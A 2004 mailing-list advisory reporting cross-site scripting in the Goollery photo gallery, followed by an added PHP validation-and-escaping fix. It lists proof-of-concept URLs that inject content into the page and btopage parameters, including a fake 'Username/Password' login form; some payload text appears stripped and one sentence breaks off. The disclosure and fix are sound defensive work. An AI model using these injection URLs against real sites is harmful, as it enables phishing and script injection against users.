From: Lostmon
Date: Sun, 31 Oct 2004 23:58:53 +0100

####################################################
#XSS in Goollery Gmail script for view Photo Gallery #
# os-win 2000 sp4 IE 6.x All fixes #
#Vendor URL: http://www.wirzm.ch/goollery/about/about.php###
####################################################

Goollery is a GMail based photo gallery. You can upload pictures from a website. The pictures will automatically be stored in your gmail account.

Some security flaws let malicious users to

This is just a proof of concept!

###################################
#File viewalbum.php and viewpic.php XSS vulnerability:#
###################################

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=[XSS-CODE]&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=XSS%20poW@!!&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=Username:
Password:
&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=XSS%20poW@!!&sess=daf5c642ade1162f15c4eb4b7e89da17

http://[TARGET]/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=Username:
Password:

http://[TARGET]/goollery/viewalbum.php?conversation_id=ffee00b71f3931a&page=XSS%20poW@!!&sess=daf5c642ade1162f15c4eb4b7e89da17

Sincerely:

Lostmon (Lostmon(at)Gmail.com)

Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella for being my light
Ipy :*****
--
Curiosity is what makes the mind move....

================================================================

From: Lostmon
Date: Mon, 1 Nov 2004 00:38:05 +0100

hiz

Yes [this affects] version 0.03

http://www.wirzm.ch/goollery/main.php
here is a demo for test
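
Added example, not part of the original posts and not Goollery's own code: one way to handle the reported parameters so that they cannot carry markup into the page. The helper names are hypothetical, and it is an assumption (based on the sample values in the report) that page is a number and that conversation_id and sess are hex strings.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; Goollery's real code is not shown in the advisory.

/** Escape a value for an HTML text or attribute context. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return a positive page number, or $default when the input is not one. */
function page_number(array $query, string $name, int $default = 1): int
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw)) {          // missing, or an array such as page[]=1
        return $default;
    }
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? $default : $n;
}

/** Return a hex identifier (conversation_id, sess), or null when malformed. */
function hex_id(array $query, string $name, int $maxLen = 64): ?string
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw) || $raw === '' || strlen($raw) > $maxLen || !ctype_xdigit($raw)) {
        return null;
    }
    return $raw;
}

// Constructed request: markup in `page`, standing in for the report's placeholder.
$query = [
    'conversation_id' => 'ffee00b71f3931a',
    'page'            => '<b>not a number</b>',
    'sess'            => 'daf5c642ade1162f15c4eb4b7e89da17',
];

// Unsafe pattern (assumed): echo 'Page ' . $query['page'];
$page = page_number($query, 'page');
$conv = hex_id($query, 'conversation_id');
if ($conv === null) {
    http_response_code(400);
    exit("Bad request\n");
}
$link = 'viewalbum.php?' . http_build_query(['conversation_id' => $conv, 'page' => $page + 1]);
echo 'Page ' . h((string) $page) . ' <a href="' . h($link) . '">next</a>' . "\n";
```

The same validate-then-escape handling would apply to btopage in viewpic.php.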